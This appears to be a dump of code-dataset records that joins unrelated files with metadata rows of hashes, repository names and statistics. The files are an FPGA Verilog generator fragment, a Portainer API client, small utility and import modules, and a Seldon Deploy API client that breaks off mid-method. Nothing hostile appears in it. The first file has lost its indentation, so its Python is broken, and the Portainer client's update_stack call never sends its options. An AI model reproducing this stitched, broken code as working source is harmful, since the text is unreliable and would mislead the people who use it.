line_to_print = ' io_tile_' + str(y_cor) + '_' + str(x_cor) + '.io.configs_en := io.configs_en(' + str(_end_index) + ', ' + str(_start_index) + ')\n'
fpga_tile_fp.write(line_to_print)
for x_cor in range (1, x_size + 1):
y_cor = y_size + 1
_start_index = fpga_config_start_index[y_cor]
_end_index = fpga_config_start_index[y_cor] + fpga_config_depth[y_cor][x_cor] - 1
line_to_print = ' io_tile_' + str(y_cor) + '_' + str(x_cor) + '.io.configs_en := io.configs_en(' + str(_end_index) + ', ' + str(_start_index) + ')\n'
fpga_tile_fp.write(line_to_print)
# Lut Tile
for y_cor in range (1, y_size + 1):
for x_cor in range (1, x_size + 1):
_start_index = fpga_config_start_index[y_cor]
_end_index = fpga_config_start_index[y_cor] + fpga_config_depth[y_cor][x_cor] - 1
line_to_print = ' lut_tile_' + str(y_cor) + '_' + str(x_cor) + '.io.configs_en := io.configs_en(' + str(_end_index) + ', ' + str(_start_index) + ')\n'
fpga_tile_fp.write(line_to_print)
def generate_verilog_fpga_tile(fpga_route, fpga_config_depth, fpga_config_start_index, fpga_lut_tile, fpga_io_tile, x_size, y_size, num_io_ipin, num_io_opin, num_config_depth, const_node_count):
# open_file_for_writing
fpga_tile_filename = 'gen_src/fpga.v'
fpga_tile_fp = open (fpga_tile_filename, 'w')
if x_size == y_size:
generate_verilog_fpga_header (fpga_tile_fp, num_io_ipin*x_size, num_io_opin*x_size, 32*(x_size+2), num_config_depth)
generate_verilog_wires (fpga_tile_fp, fpga_route, const_node_count)
generate_verilog_fpga_tile_declare (fpga_tile_fp, fpga_lut_tile, fpga_io_tile, x_size, y_size, fpga_config_depth, fpga_config_start_index)
generate_verilog_lut_tile_ipin (fpga_tile_fp, fpga_lut_tile, fpga_route, x_size, y_size, const_node_count)
generate_verilog_lut_tile_opin (fpga_tile_fp, fpga_lut_tile, x_size, y_size)
generate_verilog_lut_tile_chanxy (fpga_tile_fp, fpga_lut_tile, fpga_route, x_size, y_size, const_node_count)
generate_verilog_io_tile_ipin (fpga_tile_fp, fpga_io_tile, fpga_route)
generate_verilog_io_tile_opin (fpga_tile_fp, fpga_io_tile)
generate_verilog_io_tile_chanxy (fpga_tile_fp, fpga_io_tile, fpga_route)
else:
print 'WARNING: CHIP IS NOT IN SQUARE SHAPE'
# close file
fpga_tile_fp.write('endmodule\n')
fpga_tile_fp.close()
#def generate_scala_fpga_tile(fpga_route, fpga_config_depth, fpga_config_start_index, fpga_lut_tile, fpga_io_tile, x_size, y_size, const_node_count):
#
# # open file for writing
# fpga_tile_filename = 'gen_src/fpga.scala'
# fpga_tile_fp = open (fpga_tile_filename, 'w')
#
# generate_fpga_tile_declare (fpga_tile_fp, fpga_lut_tile, fpga_io_tile, x_size, y_size)
# generate_wires (fpga_tile_fp, fpga_route, const_node_count)
# generate_fpga_tile_ff_en (fpga_tile_fp, x_size, y_size)
# generate_lut_tile_ipin (fpga_tile_fp, fpga_lut_tile, fpga_route, x_size, y_size, const_node_count)
# generate_lut_tile_chanxy (fpga_tile_fp, fpga_lut_tile, fpga_route, x_size, y_size, const_node_count)
# generate_fpga_configs_in (fpga_tile_fp, x_size, y_size)
# generate_fpga_io_conn(fpga_tile_fp, fpga_io_tile, x_size, y_size)
# generate_io_tile_chanxy (fpga_tile_fp, fpga_io_tile, fpga_route)
# generate_io_tile_ipin (fpga_tile_fp, fpga_io_tile, fpga_route)
# generate_io_tile_opin (fpga_tile_fp, fpga_io_tile)
# generate_lut_tile_opin (fpga_tile_fp, fpga_lut_tile, x_size, y_size)
# generate_tile_configs_en (fpga_tile_fp, fpga_config_depth, fpga_config_start_index, x_size, y_size)
#
# # close file
# fpga_tile_fp.write('\n}\n')
# fpga_tile_fp.close()
| 51.07871 | 197 | 0.626383 | 6,433 | 39,586 | 3.341676 | 0.01912 | 0.117784 | 0.215937 | 0.113039 | 0.961716 | 0.952458 | 0.944876 | 0.939108 | 0.928316 | 0.918686 | 0 | 0.011685 | 0.247689 | 39,586 | 774 | 198 | 51.144703 | 0.710151 | 0.035113 | 0 | 0.75619 | 1 | 0 | 0.162749 | 0.01389 | 0.017143 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.007619 | null | null | 0.52 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 11 |
e541a22589e2e52e2adfb1e745377003aba63ba8 | 4,951 | py | Python | pyportainer/pyportainer.py | sirmmo/pyportainer | 626da406cdc3c1f1d22bd98170b3c26cfc58d594 | [
"MIT"
] | 2 | 2018-04-24T22:48:49.000Z | 2021-03-25T20:05:10.000Z | pyportainer/pyportainer.py | sirmmo/pyportainer | 626da406cdc3c1f1d22bd98170b3c26cfc58d594 | [
"MIT"
] | 1 | 2018-07-02T13:58:49.000Z | 2018-07-02T15:57:50.000Z | pyportainer/pyportainer.py | sirmmo/pyportainer | 626da406cdc3c1f1d22bd98170b3c26cfc58d594 | [
"MIT"
] | 2 | 2019-09-19T23:28:35.000Z | 2020-04-20T19:44:46.000Z | import json
import requests
class PyPortainer():
def __init__(self, portainer_endpoint, verifySSL=True):
self.portainer_endpoint = portainer_endpoint+"/api"
self.verifySSL = verifySSL
def login(self, username, password):
r = requests.post(
self.portainer_endpoint+"/auth",
data=json.dumps({"Username":username, "Password":password}),
verify=self.verifySSL)
j = r.json()
self.token = j.get("jwt")
def get_dockerhub_info(self):
r = requests.get(
self.portainer_endpoint+"/dockerhub",
headers={"Authorization": "Bearer {}".format(self.token)},
verify=self.verifySSL)
return r.json()
def put_dockerhub_info(self, options):
r = requests.put(
self.portainer_endpoint+"/dockerhub",
data=json.dumps(options),
headers={"Authorization": "Bearer {}".format(self.token)},
verify=self.verifySSL)
return r.json()
def get_status(self):
r = requests.get(
self.portainer_endpoint+"/status",
headers={"Authorization": "Bearer {}".format(self.token)},
verify=self.verifySSL)
return r.json()
def get_endpoints(self):
r = requests.get(
self.portainer_endpoint+"/endpoints",
headers={"Authorization": "Bearer {}".format(self.token)},
verify=self.verifySSL)
return r.json()
def new_endpoint(self, options):
r = requests.post(
self.portainer_endpoint+"/endpoints",
data=json.dumps(options),
headers={"Authorization": "Bearer {}".format(self.token)},
verify=self.verifySSL)
return r.json()
def get_endpoint(self, identifier):
r = requests.get(
self.portainer_endpoint+"/endpoints/{}".format(identifier),
headers={"Authorization": "Bearer {}".format(self.token)},
verify=self.verifySSL)
return r.json()
def update_endpoint(self, identifier, options):
r = requests.put(
self.portainer_endpoint+"/endpoints/{}".format(identifier),
data=json.dumps(options),
headers={"Authorization": "Bearer {}".format(self.token)},
verify=self.verifySSL)
return r.json()
def delete_endpoint(self, identifier):
r = requests.delete(
self.portainer_endpoint+"/endpoints/{}".format(identifier),
headers={"Authorization": "Bearer {}".format(self.token)},
verify=self.verifySSL)
return r.json()
def access_endpoint(self, identifier, options):
r = requests.put(
self.portainer_endpoint+"/endpoints/{}/access".format(identifier),
data=json.dumps(options),
headers={"Authorization": "Bearer {}".format(self.token)},
verify=self.verifySSL)
return r.json()
def get_stacks(self, endpoint):
r = requests.get(
self.portainer_endpoint + "/endpoints/{}/stacks".format(endpoint),
headers={"Authorization": "Bearer {}".format(self.token)},
verify=self.verifySSL)
return r.json()
def new_stack(self, endpoint, options):
r = requests.post(
self.portainer_endpoint + "/endpoints/{}/stacks".format(endpoint),
data=json.dumps(options),
headers={"Authorization": "Bearer {}".format(self.token)},
verify=self.verifySSL)
return r.json()
def get_stack(self, endpoint, stack):
r = requests.get(
self.portainer_endpoint + "/endpoints/{}/stacks/{}".format(endpoint, stack),
headers={"Authorization": "Bearer {}".format(self.token)},
verify=self.verifySSL)
return r.json()
def update_stack(self, endpoint, stack, options):
r = requests.put(
self.portainer_endpoint + "/endpoints/{}/stacks/{}".format(endpoint, stack),
headers={"Authorization": "Bearer {}".format(self.token)},
verify=self.verifySSL)
return r.json()
def delete_stack(self, endpoint, stack):
r = requests.delete(
self.portainer_endpoint + "/endpoints/{}/stacks/{}".format(endpoint, stack),
headers={"Authorization": "Bearer {}".format(self.token)},
verify=self.verifySSL)
return r.json()
def get_stackfile(self, endpoint, stack):
r = requests.get(
self.portainer_endpoint + "/endpoints/{}/stacks/{}/stackfile".format(endpoint, stack),
headers={"Authorization": "Bearer {}".format(self.token)},
verify=self.verifySSL)
return r.json()
| 36.138686 | 99 | 0.562715 | 471 | 4,951 | 5.830149 | 0.095541 | 0.117626 | 0.137655 | 0.1748 | 0.840131 | 0.824108 | 0.801894 | 0.721049 | 0.677713 | 0.677713 | 0 | 0 | 0.299333 | 4,951 | 137 | 100 | 36.138686 | 0.791583 | 0 | 0 | 0.731481 | 0 | 0 | 0.122375 | 0.020598 | 0 | 0 | 0 | 0 | 0 | 1 | 0.157407 | false | 0.018519 | 0.018519 | 0 | 0.324074 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e5b665c377656f6ac743c799c0531093d63a5ab4 | 119 | py | Python | scripts/utils.py | kjenney/community-ops | c9132079e3685f7457199ef2f37c7d5d8361d67e | [
"Apache-2.0"
] | 14 | 2021-08-10T03:46:25.000Z | 2022-03-16T11:25:01.000Z | scripts/utils.py | kjenney/community-ops | c9132079e3685f7457199ef2f37c7d5d8361d67e | [
"Apache-2.0"
] | null | null | null | scripts/utils.py | kjenney/community-ops | c9132079e3685f7457199ef2f37c7d5d8361d67e | [
"Apache-2.0"
] | 4 | 2020-11-03T07:14:45.000Z | 2022-02-25T23:31:53.000Z | def print_header(text):
print("\n\n**********************")
print(text)
print("**********************\n")
| 19.833333 | 39 | 0.344538 | 11 | 119 | 3.636364 | 0.454545 | 0.45 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.151261 | 119 | 5 | 40 | 23.8 | 0.39604 | 0 | 0 | 0 | 0 | 0 | 0.423729 | 0.423729 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0 | 0.25 | 1 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
e5fafb1a4e21a0dd48d8a25ec48fef57726dfc6e | 194 | py | Python | libcheesevoyage/intrcn_lcv/__init__.py | fl4shk/libcheesevoyage | 559a27a95e14f25f2e7173a09566775013e40b1a | [
"MIT"
] | null | null | null | libcheesevoyage/intrcn_lcv/__init__.py | fl4shk/libcheesevoyage | 559a27a95e14f25f2e7173a09566775013e40b1a | [
"MIT"
] | null | null | null | libcheesevoyage/intrcn_lcv/__init__.py | fl4shk/libcheesevoyage | 559a27a95e14f25f2e7173a09566775013e40b1a | [
"MIT"
] | null | null | null | from libcheesevoyage.intrcn_lcv.xbar_switch_mod import *
from libcheesevoyage.intrcn_lcv.intrcn_lcv_node_bus_types import *
from libcheesevoyage.intrcn_lcv.intrcn_lcv_interconnect_mods import *
| 48.5 | 69 | 0.891753 | 27 | 194 | 5.962963 | 0.481481 | 0.279503 | 0.465839 | 0.521739 | 0.534161 | 0.534161 | 0.534161 | 0 | 0 | 0 | 0 | 0 | 0.061856 | 194 | 3 | 70 | 64.666667 | 0.884615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
f902893a9c19db0ee9f7f5f53cf9bfc163f7e3e9 | 665 | py | Python | temboo/core/Library/OneLogin/Users/__init__.py | jordanemedlock/psychtruths | 52e09033ade9608bd5143129f8a1bfac22d634dd | [
"Apache-2.0"
] | 7 | 2016-03-07T02:07:21.000Z | 2022-01-21T02:22:41.000Z | temboo/core/Library/OneLogin/Users/__init__.py | jordanemedlock/psychtruths | 52e09033ade9608bd5143129f8a1bfac22d634dd | [
"Apache-2.0"
] | null | null | null | temboo/core/Library/OneLogin/Users/__init__.py | jordanemedlock/psychtruths | 52e09033ade9608bd5143129f8a1bfac22d634dd | [
"Apache-2.0"
] | 8 | 2016-06-14T06:01:11.000Z | 2020-04-22T09:21:44.000Z | from temboo.Library.OneLogin.Users.CreateUser import CreateUser, CreateUserInputSet, CreateUserResultSet, CreateUserChoreographyExecution
from temboo.Library.OneLogin.Users.DeleteUser import DeleteUser, DeleteUserInputSet, DeleteUserResultSet, DeleteUserChoreographyExecution
from temboo.Library.OneLogin.Users.ListAll import ListAll, ListAllInputSet, ListAllResultSet, ListAllChoreographyExecution
from temboo.Library.OneLogin.Users.ShowUser import ShowUser, ShowUserInputSet, ShowUserResultSet, ShowUserChoreographyExecution
from temboo.Library.OneLogin.Users.UpdateUser import UpdateUser, UpdateUserInputSet, UpdateUserResultSet, UpdateUserChoreographyExecution
| 110.833333 | 137 | 0.894737 | 55 | 665 | 10.818182 | 0.472727 | 0.084034 | 0.142857 | 0.210084 | 0.252101 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.052632 | 665 | 5 | 138 | 133 | 0.944444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
0082d8da1b94bddc9ac20c43bb4446e959ab74fe | 29,601 | py | Python | python/seldon_deploy_sdk/api/seldon_deployments_api.py | adriangonz/seldon-deploy-sdk | c5504838630a87053387cec57ec2e1e7251971e2 | [
"Apache-2.0"
] | 6 | 2021-02-18T14:37:54.000Z | 2022-01-13T13:27:43.000Z | python/seldon_deploy_sdk/api/seldon_deployments_api.py | adriangonz/seldon-deploy-sdk | c5504838630a87053387cec57ec2e1e7251971e2 | [
"Apache-2.0"
] | 14 | 2021-01-04T16:32:03.000Z | 2021-12-13T17:53:59.000Z | python/seldon_deploy_sdk/api/seldon_deployments_api.py | adriangonz/seldon-deploy-sdk | c5504838630a87053387cec57ec2e1e7251971e2 | [
"Apache-2.0"
] | 7 | 2021-03-17T09:05:55.000Z | 2022-01-05T10:39:56.000Z | # coding: utf-8
"""
Seldon Deploy API
API to interact and manage the lifecycle of your machine learning models deployed through Seldon Deploy. # noqa: E501
OpenAPI spec version: v1alpha1
Contact: hello@seldon.io
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from seldon_deploy_sdk.api_client import ApiClient
class SeldonDeploymentsApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_seldon_deployment(self, namespace, mldeployment, **kwargs): # noqa: E501
"""create_seldon_deployment # noqa: E501
Create a Seldon Deployment # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_seldon_deployment(namespace, mldeployment, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str namespace: Namespace provides a logical grouping of resources (required)
:param SeldonDeployment mldeployment: Seldon Deployment (required)
:param str action: Action
:param str message: Message
:return: SeldonDeployment
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_seldon_deployment_with_http_info(namespace, mldeployment, **kwargs) # noqa: E501
else:
(data) = self.create_seldon_deployment_with_http_info(namespace, mldeployment, **kwargs) # noqa: E501
return data
def create_seldon_deployment_with_http_info(self, namespace, mldeployment, **kwargs): # noqa: E501
"""create_seldon_deployment # noqa: E501
Create a Seldon Deployment # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_seldon_deployment_with_http_info(namespace, mldeployment, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str namespace: Namespace provides a logical grouping of resources (required)
:param SeldonDeployment mldeployment: Seldon Deployment (required)
:param str action: Action
:param str message: Message
:return: SeldonDeployment
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'mldeployment', 'action', 'message'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_seldon_deployment" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `create_seldon_deployment`") # noqa: E501
# verify the required parameter 'mldeployment' is set
if ('mldeployment' not in params or
params['mldeployment'] is None):
raise ValueError("Missing the required parameter `mldeployment` when calling `create_seldon_deployment`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if 'action' in params:
query_params.append(('action', params['action'])) # noqa: E501
if 'message' in params:
query_params.append(('message', params['message'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'mldeployment' in params:
body_params = params['mldeployment']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/namespaces/{namespace}/seldondeployments', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SeldonDeployment', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_seldon_deployment(self, name, namespace, **kwargs): # noqa: E501
"""delete_seldon_deployment # noqa: E501
Delete the specified Seldon Deployment # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_seldon_deployment(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name identifies a resource (required)
:param str namespace: Namespace provides a logical grouping of resources (required)
:param str action: Action
:param str message: Message
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_seldon_deployment_with_http_info(name, namespace, **kwargs) # noqa: E501
else:
(data) = self.delete_seldon_deployment_with_http_info(name, namespace, **kwargs) # noqa: E501
return data
def delete_seldon_deployment_with_http_info(self, name, namespace, **kwargs): # noqa: E501
"""delete_seldon_deployment # noqa: E501
Delete the specified Seldon Deployment # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_seldon_deployment_with_http_info(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name identifies a resource (required)
:param str namespace: Namespace provides a logical grouping of resources (required)
:param str action: Action
:param str message: Message
:return: object
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'action', 'message'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_seldon_deployment" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `delete_seldon_deployment`") # noqa: E501
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `delete_seldon_deployment`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if 'action' in params:
query_params.append(('action', params['action'])) # noqa: E501
if 'message' in params:
query_params.append(('message', params['message'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/namespaces/{namespace}/seldondeployments/{name}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_seldon_deployments(self, namespace, **kwargs): # noqa: E501
"""list_seldon_deployments # noqa: E501
list objects of kind Seldon Deployment # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_seldon_deployments(namespace, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str namespace: Namespace provides a logical grouping of resources (required)
:return: SeldonDeploymentList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_seldon_deployments_with_http_info(namespace, **kwargs) # noqa: E501
else:
(data) = self.list_seldon_deployments_with_http_info(namespace, **kwargs) # noqa: E501
return data
def list_seldon_deployments_with_http_info(self, namespace, **kwargs): # noqa: E501
"""list_seldon_deployments # noqa: E501
list objects of kind Seldon Deployment # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_seldon_deployments_with_http_info(namespace, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str namespace: Namespace provides a logical grouping of resources (required)
:return: SeldonDeploymentList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_seldon_deployments" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `list_seldon_deployments`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/namespaces/{namespace}/seldondeployments', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SeldonDeploymentList', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def read_seldon_deployment(self, name, namespace, **kwargs): # noqa: E501
"""read_seldon_deployment # noqa: E501
Read the specified Seldon Deployment # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_seldon_deployment(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name identifies a resource (required)
:param str namespace: Namespace provides a logical grouping of resources (required)
:return: SeldonDeployment
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.read_seldon_deployment_with_http_info(name, namespace, **kwargs) # noqa: E501
else:
(data) = self.read_seldon_deployment_with_http_info(name, namespace, **kwargs) # noqa: E501
return data
def read_seldon_deployment_with_http_info(self, name, namespace, **kwargs): # noqa: E501
"""read_seldon_deployment # noqa: E501
Read the specified Seldon Deployment # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_seldon_deployment_with_http_info(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name identifies a resource (required)
:param str namespace: Namespace provides a logical grouping of resources (required)
:return: SeldonDeployment
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_seldon_deployment" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `read_seldon_deployment`") # noqa: E501
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `read_seldon_deployment`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/namespaces/{namespace}/seldondeployments/{name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SeldonDeployment', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_seldon_deployment(self, name, namespace, mldeployment, **kwargs): # noqa: E501
"""update_seldon_deployment # noqa: E501
Update the specified Seldon Deployment # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_seldon_deployment(name, namespace, mldeployment, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name identifies a resource (required)
:param str namespace: Namespace provides a logical grouping of resources (required)
:param SeldonDeployment mldeployment: Seldon Deployment (required)
:param str action: Action
:param str message: Message
:return: SeldonDeployment
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_seldon_deployment_with_http_info(name, namespace, mldeployment, **kwargs) # noqa: E501
else:
(data) = self.update_seldon_deployment_with_http_info(name, namespace, mldeployment, **kwargs) # noqa: E501
return data
def update_seldon_deployment_with_http_info(self, name, namespace, mldeployment, **kwargs): # noqa: E501
"""update_seldon_deployment # noqa: E501
Update the specified Seldon Deployment # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_seldon_deployment_with_http_info(name, namespace, mldeployment, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name identifies a resource (required)
:param str namespace: Namespace provides a logical grouping of resources (required)
:param SeldonDeployment mldeployment: Seldon Deployment (required)
:param str action: Action
:param str message: Message
:return: SeldonDeployment
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'mldeployment', 'action', 'message'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_seldon_deployment" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `update_seldon_deployment`") # noqa: E501
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `update_seldon_deployment`") # noqa: E501
# verify the required parameter 'mldeployment' is set
if ('mldeployment' not in params or
params['mldeployment'] is None):
raise ValueError("Missing the required parameter `mldeployment` when calling `update_seldon_deployment`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
if 'namespace' in params:
